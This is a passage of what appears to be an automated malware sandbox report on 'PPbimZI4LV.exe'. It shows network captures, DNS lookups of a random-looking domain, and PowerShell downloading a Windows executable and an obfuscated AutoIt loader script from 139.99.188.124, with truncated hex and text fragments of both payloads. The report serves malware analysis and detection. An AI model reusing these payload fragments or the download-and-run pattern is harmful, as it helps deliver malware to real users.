                                                                    Dec 18, 2024 09:19:25.790299892 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.790395975 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.790565014 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.791410923 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.791472912 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.791877031 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.792592049 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.792666912 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.793328047 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.793617964 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.793725014 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.794389963 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.794750929 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.794878006 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.795239925 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.795881033 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.796019077 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.796317101 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.796974897 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.797091007 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.798185110 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.798268080 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.798446894 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.798446894 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.799201965 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.799346924 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.799506903 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.800358057 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.800450087 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.800915003 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.801440954 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.810769081 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.810858011 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.810869932 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.811238050 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.811357975 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.811398983 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.812386990 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.812464952 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.812522888 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.813396931 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.813493967 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.813528061 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.814524889 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.814569950 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.814660072 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.815628052 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.815679073 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.815753937 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.816843987 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.816855907 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.816915989 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.817876101 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.817976952 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.817981958 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.818980932 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.819032907 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.819075108 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.820077896 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.820200920 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.820235968 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.821206093 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.821285009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.821350098 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.822257042 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.822463989 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:26.106916904 CET4973880192.168.2.6139.99.188.124
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 18, 2024 09:19:28.926529884 CET5003453192.168.2.61.1.1.1
                                                                    Dec 18, 2024 09:19:29.064598083 CET53500341.1.1.1192.168.2.6
                                                                    Dec 18, 2024 09:19:46.940355062 CET5121453192.168.2.61.1.1.1
                                                                    Dec 18, 2024 09:19:47.083857059 CET53512141.1.1.1192.168.2.6
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 18, 2024 09:19:28.926529884 CET192.168.2.61.1.1.10x6bfStandard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 09:19:46.940355062 CET192.168.2.61.1.1.10xa5beStandard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 18, 2024 09:19:29.064598083 CET1.1.1.1192.168.2.60x6bfName error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 09:19:47.083857059 CET1.1.1.1192.168.2.60xa5beName error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 09:20:00.596944094 CET1.1.1.1192.168.2.60xe48eNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 18, 2024 09:20:00.596944094 CET1.1.1.1192.168.2.60xe48eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 09:20:00.596944094 CET1.1.1.1192.168.2.60xe48eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 09:20:00.596944094 CET1.1.1.1192.168.2.60xe48eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 09:20:00.596944094 CET1.1.1.1192.168.2.60xe48eNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 09:20:02.061094999 CET1.1.1.1192.168.2.60x5a56No error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 18, 2024 09:20:02.061094999 CET1.1.1.1192.168.2.60x5a56No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 09:20:02.061094999 CET1.1.1.1192.168.2.60x5a56No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                    • 139.99.188.124
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.649721139.99.188.124801472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 18, 2024 09:19:17.368194103 CET168OUTGET /xvDYouPUJ HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                    Host: 139.99.188.124
                                                                    Connection: Keep-Alive
                                                                    Dec 18, 2024 09:19:18.869863033 CET1236INHTTP/1.1 200 OK
                                                                    Date: Wed, 18 Dec 2024 08:19:17 GMT
                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                    Last-Modified: Tue, 03 Dec 2024 12:54:38 GMT
                                                                    ETag: "da2a8-6285d2afd80b6"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 893608
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 [TRUNCATED]
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDR*R*R*CP*S*_@a*_@*_@g*[j[*[jw*R+r**S*_@S*RP*S*RichR*PEL_pZ"@@@@|Ppq; [@.text `.rdata@@.datatR@.rsrcP<@@.relocqpr@B
                                                                    Dec 18, 2024 09:19:18.870023012 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 44 61 4c 00
                                                                    Data Ascii: DaLhC\YLhCKYNhC:YhC.Y<ChCYhCYQ>hCYsLQ@sLP9hCYGhC
                                                                    Dec 18, 2024 09:19:18.870079041 CET1236INData Raw: 46 04 59 83 24 b8 00 47 3b 7e 08 72 e7 ff 76 04 83 66 08 00 e8 bc fb 01 00 59 5f 5e c3 56 8b f1 57 8b 4e 78 85 c9 75 59 8b 46 7c 83 f8 0b 0f 8f 2a a4 03 00 0f 84 0a a4 03 00 83 e8 05 74 4e 83 e8 03 0f 84 df a3 03 00 48 48 0f 84 bd a3 03 00 83 66
                                                                    Data Ascii: FY$G;~rvfY_^VWNxuYF|*tNHHfpNTF|N$NV\Y_^QfxNptQ,SV3WN~^^^N$NT^4^8^<^@^D~H~L^P^d^h^p^x
                                                                    Dec 18, 2024 09:19:18.870116949 CET1236INData Raw: 89 45 f4 f7 d9 89 55 0c 89 4d 08 80 38 08 73 53 83 c2 08 40 89 45 f4 05 f0 f7 ff ff 03 c1 89 55 0c 3b 46 0c 8b 45 f4 7c e2 8b 46 0c 3b d8 74 1a 2b c3 50 8d 86 10 08 00 00 03 c3 50 8d 43 02 8d 04 c6 50 57 ff 15 24 01 49 00 8b 76 04 85 f6 75 8d ff
                                                                    Data Ascii: EUM8sS@EU;FE|F;t+PPCPW$IvuuW_^[];t +QPCPW$IEUMtDuLMtuWzME8tM@tEujPQWEUM#E
                                                                    Dec 18, 2024 09:19:18.870152950 CET896INData Raw: 00 83 7e 4c ff 8b f8 74 03 8b 7e 4c 57 53 ff 15 40 01 49 00 6a 00 57 e8 55 08 00 00 eb 8f 8b c8 83 e9 4e 0f 84 aa 9e 03 00 83 e9 05 0f 84 90 9e 03 00 83 e9 28 0f 84 71 9e 03 00 83 e9 09 0f 84 52 9e 03 00 81 e9 8d 00 00 00 0f 84 30 9e 03 00 49 0f
                                                                    Data Ascii: ~Lt~LWS@IjWUN(qR0IIIDjUuuR+t#I4Iu-V&SVPWPVItIIhQQVCj~jwQHjUVW
                                                                    Dec 18, 2024 09:19:18.870188951 CET1236INData Raw: 89 45 ec 8d 45 cc 50 ff 36 ff 15 34 06 49 00 8b 4d d4 8b 45 d8 8b 56 44 8b 7e 48 89 4d 10 89 45 0c 89 55 f8 89 7d 08 85 c9 0f 84 64 9c 03 00 85 c0 0f 84 73 9c 03 00 83 be 9c 01 00 00 00 0f 85 7d 9c 03 00 8d 45 cc 50 ff 33 ff 15 94 06 49 00 8b 45
                                                                    Data Ascii: EEP64IMEVD~HMEU}ds}EP3IEM+UEE+EEP6UMpI}EuM}fE}fEE}fEE}fft(EfuE
                                                                    Dec 18, 2024 09:19:18.870225906 CET1236INData Raw: 00 00 02 06 03 04 05 06 05 05 06 06 06 06 01 06 05 01 06 06 06 02 05 02 02 03 cc cc cc 55 8b ec a1 38 78 4c 00 83 ec 0c 8b 4d 08 8b ff 85 c0 74 1c 8b 10 39 0a 74 05 8b 40 04 eb f1 8b 4d 0c 01 4a 04 8b 00 8b 40 08 8b e5 5d c2 08 00 51 89 4d f4 c7
                                                                    Data Ascii: U8xLMt9t@MJ@]QMEHIE8xLEPEUMtW}N_]UQQSVW}EP7IElEpEPVpIME;tuc;xu[s5IsE
                                                                    Dec 18, 2024 09:19:18.870281935 CET1236INData Raw: 00 85 c9 0f 85 63 98 03 00 83 25 84 78 4c 00 00 8b 0d 38 78 4c 00 85 c9 0f 85 62 98 03 00 83 25 40 78 4c 00 00 b9 20 78 4c 00 e8 e4 e8 ff ff b9 0c 78 4c 00 e8 1e e8 ff ff b9 f0 77 4c 00 e8 1c f1 00 00 a1 e0 77 4c 00 85 c0 0f 85 44 98 03 00 5e c3
                                                                    Data Ascii: c%xL8xLb%@xL xLxLwLwLD^U(SVWh*YA^xL}M9wLEPxL}xL]8xLpuE @
                                                                    Dec 18, 2024 09:19:18.870316982 CET1236INData Raw: 24 0c 8b 04 90 8b 38 89 7c 24 1c 8a 97 90 00 00 00 0f b6 c2 83 f8 11 0f 8e da 96 03 00 83 e8 13 0f 84 e8 9b 03 00 48 0f 84 a0 9b 03 00 48 48 0f 84 1f 9b 03 00 83 e8 05 0f 85 00 9b 03 00 57 51 e8 ad ee ff ff ff 37 ff 15 3c 06 49 00 8b 74 24 0c 83
                                                                    Data Ascii: $8|$HHHWQ7<It$Du3du8hu=PuBD$;FtDP3@_^[]3wDIwdIwh<IwP<IL$NUE(SV5xLW~
                                                                    Dec 18, 2024 09:19:18.870353937 CET1236INData Raw: 4c 00 00 75 0f 83 3d dc 77 4c 00 00 0f 85 22 9d 03 00 5e c3 a1 3c 78 4c 00 8b 00 ff 70 08 ff 15 c8 00 49 00 a1 3c 78 4c 00 85 c0 74 6a 8b c8 8b 40 08 a3 3c 78 4c 00 85 c9 74 0b 51 e8 d8 e0 ff ff a1 3c 78 4c 00 85 c0 74 38 83 60 04 00 a1 3c 78 4c
                                                                    Data Ascii: Lu=wL"^<xLpI<xLtj@<xLtQ<xLt8`<xL@xLI@xLuxLDt0<Ii%8xLT@xLUQVW}3M97tKAdESt<A`t*W3$It3@[_^]MF
                                                                    Dec 18, 2024 09:19:18.990921974 CET1236INData Raw: 3c 38 05 89 82 4c 00 75 4c 8b 0d 84 82 4c 00 ff 75 10 ff 75 0c ff 75 08 e8 b3 04 00 00 5d c2 10 00 83 3d 80 82 4c 00 00 ff 75 10 ff 75 0c ff 75 08 75 2c b9 70 82 4c 00 eb de 48 75 0b ff 75 10 ff 75 0c ff 75 08 eb eb 83 e8 0e 0f 84 74 99 03 00 33
                                                                    Data Ascii: <8LuLLuuu]=Luuuu,pLHuuuut3LHL2UQQVW~^~u~S^CEtT;tDtwuHuGEtuYWYSEYFF[_


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.649738139.99.188.124807496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 18, 2024 09:19:21.871556997 CET76OUTGET /BlQMSgJx.txt HTTP/1.1
                                                                    Host: 139.99.188.124
                                                                    Connection: Keep-Alive
                                                                    Dec 18, 2024 09:19:23.377403021 CET1236INHTTP/1.1 200 OK
                                                                    Date: Wed, 18 Dec 2024 08:19:21 GMT
                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                    Last-Modified: Tue, 03 Dec 2024 12:54:38 GMT
                                                                    ETag: "12f072-6285d2afd6177"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 1241202
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: text/plain
                                                                    Data Raw: 46 75 6e 63 20 4e 75 74 72 69 74 69 6f 6e 53 70 65 65 64 4d 61 79 6f 72 46 61 6d 69 6c 69 65 73 28 24 53 6d 4b 69 73 73 2c 20 24 45 66 66 69 63 69 65 6e 74 6c 79 46 6f 72 6d 75 6c 61 2c 20 24 43 6f 6e 73 75 6c 74 69 6e 67 53 6f 72 74 73 4c 61 62 73 2c 20 24 66 75 72 74 68 65 72 74 65 72 72 6f 72 69 73 74 2c 20 24 42 49 4b 45 4f 43 43 55 52 52 45 4e 43 45 53 4c 49 47 48 54 2c 20 24 52 65 76 65 72 73 65 50 68 69 6c 69 70 70 69 6e 65 73 29 0a 24 50 64 42 6c 6f 63 6b 73 52 65 73 70 6f 6e 73 65 44 61 74 20 3d 20 27 37 33 39 31 31 39 36 31 38 37 37 32 27 0a 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 0a 24 69 6f 73 79 6d 70 68 6f 6e 79 73 65 65 6d 73 63 72 75 63 69 61 6c 20 3d 20 35 30 0a 46 6f 72 20 24 4f 64 48 42 74 20 3d 20 32 38 20 54 6f 20 38 36 35 0a 49 66 20 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 32 20 54 68 65 6e 0a 53 71 72 74 28 37 39 35 35 29 0a 46 69 6c 65 45 78 69 73 74 73 28 [TRUNCATED]
                                                                    Data Ascii: Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)$PdBlocksResponseDat = '739119618772'$VerifiedUnderstoodValidation = 34$iosymphonyseemscrucial = 50For $OdHBt = 28 To 865If $VerifiedUnderstoodValidation = 32 ThenSqrt(7955)FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUnderstoodValidation = 33 ThenConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5))DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2))Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUndersto
                                                                    Dec 18, 2024 09:19:23.377449036 CET224INData Raw: 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 20 54 68 65 6e 0a 24 4e 75 74 74 65 6e 49 6e 76 65 73 74 6f 72 73 52 61 6c 65 69 67 68 20 3d 20 44 65 63 28 57 61 6c 65 73 28 22 31 30 34 5d 31 31 33 5d 31 30 35 5d 38 36 5d 38 35 5d 39 36 5d 38
                                                                    Data Ascii: odValidation = 34 Then$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]83]73]78]127]105]97]79]105]77",28/4))ExitLoopEndIfNext$LAYERSSTRICTINNOVATIVE = '66150718350940696046327902621'$DmModsQueries = 68$DRESSD
                                                                    Dec 18, 2024 09:19:23.377479076 CET1236INData Raw: 45 41 52 41 4e 54 49 51 55 45 53 20 3d 20 39 33 0a 57 68 69 6c 65 20 39 38 0a 49 66 20 24 44 6d 4d 6f 64 73 51 75 65 72 69 65 73 20 3d 20 36 36 20 54 68 65 6e 0a 41 54 61 6e 28 35 34 38 33 29 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73
                                                                    Data Ascii: EARANTIQUES = 93While 98If $DmModsQueries = 66 ThenATan(5483)DriveStatus(Wales("90]117]120]112]110]119]121]40]72]116]115]120]122]113]121]102]115]121]40]72]116]122]119]120]106]40",35/7))ACos(1640)$DmModsQueries = $DmModsQueries + 1EndIf
                                                                    Dec 18, 2024 09:19:23.377518892 CET1236INData Raw: 32 33 5d 38 38 5d 38 35 5d 37 32 5d 31 30 35 5d 37 33 5d 31 30 32 5d 31 32 37 5d 31 32 36 5d 38 32 5d 31 31 39 22 2c 35 2f 31 29 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 6d 61 72 6b 63 6f 61 74 20 3d 20 27 35 37 31 31
                                                                    Data Ascii: 23]88]85]72]105]73]102]127]126]82]119",5/1))ExitLoopEndIfNext$markcoat = '571122626772955393541120575471284845703735808343'$HOLDEMOLDSIGMA = 67$RecognitionConnecting = 61While 422If $HOLDEMOLDSIGMA = 66 ThenChr(4037)ConsoleWriteError
                                                                    Dec 18, 2024 09:19:23.377552032 CET1236INData Raw: 30 37 5d 31 30 38 5d 31 32 30 5d 33 39 22 2c 32 34 2f 36 29 29 0a 46 69 6c 65 45 78 69 73 74 73 28 57 61 6c 65 73 28 22 38 31 5d 31 31 35 5d 31 30 36 5d 31 30 30 5d 31 30 32 5d 31 31 36 5d 39 35 5d 36 36 5d 31 31 31 5d 31 31 32 5d 31 31 37 5d 31
                                                                    Data Ascii: 07]108]120]39",24/6))FileExists(Wales("81]115]106]100]102]116]95]66]111]112]117]105]102]115]95",8/8))PixelGetColor(Wales("84]117]112]115]102]101]95]83]102]119]106]116]106]112]111]116]95",8/8), Wales("84]117]112]115]102]101]95]83]102]119]106]
                                                                    Dec 18, 2024 09:19:23.377588034 CET1236INData Raw: 33 5d 31 31 30 5d 31 31 35 5d 31 31 36 5d 39 37 5d 31 31 30 5d 31 31 36 5d 34 32 5d 36 38 5d 31 31 31 5d 31 31 31 5d 31 31 34 5d 34 32 5d 36 37 5d 31 31 31 5d 31 30 39 5d 31 30 39 5d 31 31 31 5d 31 31 30 5d 31 31 35 5d 34 32 22 2c 30 2f 33 29 29
                                                                    Data Ascii: 3]110]115]116]97]110]116]42]68]111]111]114]42]67]111]109]109]111]110]115]42",0/3))$DILDOSYIELDSFAREADDRESSED = $DILDOSYIELDSFAREADDRESSED + 1EndIfIf $DILDOSYIELDSFAREADDRESSED = 36 Then$smsearsuperposing = Dec(Wales("128]124]95]85]109]85]1
                                                                    Dec 18, 2024 09:19:23.377661943 CET1236INData Raw: 2f 38 29 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 49 66 20 24 4c 65 73 73 50 68 6f 6e 65 20 3d 20 32 39 20 54 68 65 6e 0a 41 53 69 6e 28 39 39 39 33 29 0a 53 71 72 74 28 34 35 33 31 29 0a 43 6f 6e 73 6f 6c 65 57 72 69 74 65 45 72 72 6f
                                                                    Data Ascii: /8))ExitLoopEndIfIf $LessPhone = 29 ThenASin(9993)Sqrt(4531)ConsoleWriteError(Wales("68]112]110]110]98]111]101]102]115]48]81]115]112]101]118]100]102]115]48]81]115]112]104]115]98]110]110]102]116]48",5/5))$LessPhone = $LessPhone + 1EndIf
                                                                    Dec 18, 2024 09:19:23.377716064 CET1236INData Raw: 32 35 36 34 29 0a 43 68 72 28 38 31 34 32 29 0a 41 53 69 6e 28 32 37 34 30 29 0a 24 43 4f 41 43 48 43 45 4c 4c 55 4c 41 52 20 3d 20 24 43 4f 41 43 48 43 45 4c 4c 55 4c 41 52 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 43 4f 41 43 48 43 45 4c 4c
                                                                    Data Ascii: 2564)Chr(8142)ASin(2740)$COACHCELLULAR = $COACHCELLULAR + 1EndIfIf $COACHCELLULAR = 24 Then$funkypeasmay = Dec(Wales("114]106]80]111]88]94]114]93]87]104]71]121]126",12/2))ExitLoopEndIfNext$DianaMagnetTomatoesAssignment = '00830826240
                                                                    Dec 18, 2024 09:19:23.377752066 CET1236INData Raw: 24 48 65 72 65 62 79 46 61 71 20 3d 20 24 48 65 72 65 62 79 46 61 71 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 48 65 72 65 62 79 46 61 71 20 3d 20 35 35 20 54 68 65 6e 0a 24 43 6f 6e 73 6f 6c 65 73 50 73 79 63 68 6f 6c 6f 67 69 63 61 6c 50 6f
                                                                    Data Ascii: $HerebyFaq = $HerebyFaq + 1EndIfIf $HerebyFaq = 55 Then$ConsolesPsychologicalPorno = FileExists(Wales("80]73]120]85]115]93]105]76]87]76]102]72]78]72]116]77",3/1))ExitLoopEndIfWEndEndFunc$IllnessFolk = 8$BBNYCROLLER = 82For $ZmdCXdw =
                                                                    Dec 18, 2024 09:19:23.377787113 CET1236INData Raw: 37 5d 31 31 33 5d 31 31 38 5d 31 30 38 5d 31 30 32 5d 37 34 5d 31 30 35 5d 31 31 38 5d 31 31 31 5d 31 30 32 5d 38 38 5d 31 32 33 5d 31 32 39 5d 31 30 37 5d 31 31 32 5d 31 31 33 5d 31 30 35 5d 31 32 34 5d 31 32 32 5d 31 32 39 5d 31 30 32 5d 38 33
                                                                    Data Ascii: 7]113]118]108]102]74]105]118]111]102]88]123]129]107]112]113]105]124]122]129]102]83]118]119]107]115]102",16/2))ATan(583)$ImmediatelyMarbleIncorporatedHour = $ImmediatelyMarbleIncorporatedHour + 1EndIfIf $ImmediatelyMarbleIncorporatedHour =
                                                                    Dec 18, 2024 09:19:23.497618914 CET1236INData Raw: 6f 72 28 34 31 2c 20 36 33 32 2c 20 30 29 0a 24 52 45 4a 45 43 54 52 45 53 45 52 56 4f 49 52 4c 4f 43 4b 45 4e 4a 4f 59 45 44 20 3d 20 24 52 45 4a 45 43 54 52 45 53 45 52 56 4f 49 52 4c 4f 43 4b 45 4e 4a 4f 59 45 44 20 2b 20 31 0a 45 6e 64 49 66
                                                                    Data Ascii: or(41, 632, 0)$REJECTRESERVOIRLOCKENJOYED = $REJECTRESERVOIRLOCKENJOYED + 1EndIfIf $REJECTRESERVOIRLOCKENJOYED = 89 Then$RECOMMENDEDDOCUMENTED = 56$CompetitorsSolve = 60For $tqHu = 73 To 768If $RECOMMENDEDDOCUMENTED = 54 ThenExp(544)P


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:1
                                                                    Start time:03:19:11
                                                                    Start date:18/12/2024
                                                                    Path:C:\Users\user\Desktop\PPbimZI4LV.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\PPbimZI4LV.exe"
                                                                    Imagebase:0x7ff643920000
                                                                    File size:1'083'904 bytes
